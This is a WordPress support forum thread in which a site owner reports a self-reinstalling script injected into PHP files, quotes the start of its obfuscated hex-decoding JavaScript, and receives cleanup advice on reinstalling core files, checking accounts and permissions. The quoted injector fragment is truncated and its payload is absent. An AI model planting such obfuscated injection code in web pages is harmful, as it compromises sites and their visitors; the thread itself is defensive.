hi-Jacked! – Bad Script keeps self installing in.php

  • Hi – Somehow i have gotten a ‘self installing’ script that i delete from .php files (like index.php) and then the next day it keeps coming back

    It gets into the themes files as well the main wordpress files

    i have completely deleted and reinstalled the themes folder/files and the main wp-files, but it must be hiding somewhere

    it starts like this (always at the bottom of the file/page)
    <script>function vtbtYbadtYV(vbYaydVYxVd){ var vtYaxxxxdYV=17; return(parseInt(vbYaydVYxVd,16));}function vdtxbVVxYat(vytVtdYbVdt){ function vyddVtYbVyV () {var vtVbbtbbxxt=17; return vtVbbtbbxxt;} var vdYYdxYVybV='';for(vdxVybaVVYb=0; vdxVybaVVYb<vytVtdYbVdt.length; vdxVybaVVYb+=2){vdYYdxYVybV+=(String.fromCharCode(vtbtYbadtYV(vytVtdYbVdt.substr(vdxVybaVVYb,2))));}return vdYYdxYVybV;} document.write(vdtxbVVxYat('3C534 heaps of numbers continue..etc etc... then script ends...

    Has anyone seen this before or have any ideas where it might be hiding? Or how to remove it???

    (it’s also making my footer ‘hidden’ and has caused the error message “headers already sent”)

    wp is in my root directory and the only other files i have uploaded are plugins i got from www.ads-software.com, and a theme i bought (which is fine – it was working for at least a week before this script turned up and i bought from a reputable site)

    pls help!
    thx
    Rea

Viewing 7 replies - 1 through 7 (of 7 total)

  • you need to upgrade.

    delete all the core wp files except:

    do NOT delete wp-config.php
    do NOT delete your wp-content/themes directory (or whats in it)
    do NOT delete your wp-content/plugins directory (or whats in it)

    UPLOAD all the fresh 2.6.2 files

    During that process, your ftp client might prompt you to overwrite a few files:

    the askimet plugin files
    hello.php (the other default plugin)
    the 2 themes that comes with wordpress

    go ahead and do that.

    after doing that, open your old wp-config.php and make sure it doesnt have any strange code in it.

    Check your database for rouge user accounts.

    change your admin password for the blog.

    check your file and directory permissions

    these are all things you need to do.

    Thread Starter rea68

    (@rea68)

    thx
    i will try that,

    rea

    i can give you a tip too on the deleting and uploading..

    what I do is go directory at a time. so ill delete everything inside wp-includes and then upload all the fresh stuff.

    check to make sure its all good.

    then move onto the wp-admin directory. delete it all, upload fresh files. check to make sure its all good

    then the files that are in the blog root (where wp-config.php is)

    (same process)

    then last wp-content/ and thats where you will overwrite the files I already mentioned.

    doing the files in chunks breaks down the process so i can pay closer attention, I think.

    and do keep in mind, that you also ought to be looking through the theme you bought for any unusual or malicious looking code.

    and check to make sure your plugins are current.

    Thread Starter rea68

    (@rea68)

    thx again – will do

    rea

    Thread Starter rea68

    (@rea68)

    hi again – sorry, but am not sure what the file and directory permissions should be? can you help or link me to somewhere?

    thx again, i’m getting there…
    rea

    for files in wp-admin and wp-includes 664 should work.
    For wp-content – it depends. If you want to be able to modify your themes from within WP admin, you need to leave the files writable. If you don’t plan to edit themes, you can make them read-only.

    Thread Starter rea68

    (@rea68)

    hi – thx for that, useshots, will look at it too…

    UPDATE – the script was ‘hiding’ on my server and my webhost has located it and “killed” it (removed)… horrible little thing,

    still don’t know how i got it or where it came from, but was a nasty little thing (they said)…

    talk about an intro to wp and webhosting etc!

    thx 4 help
    rea

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘hi-Jacked! – Bad Script keeps self installing in.php’ is closed to new replies.

Tags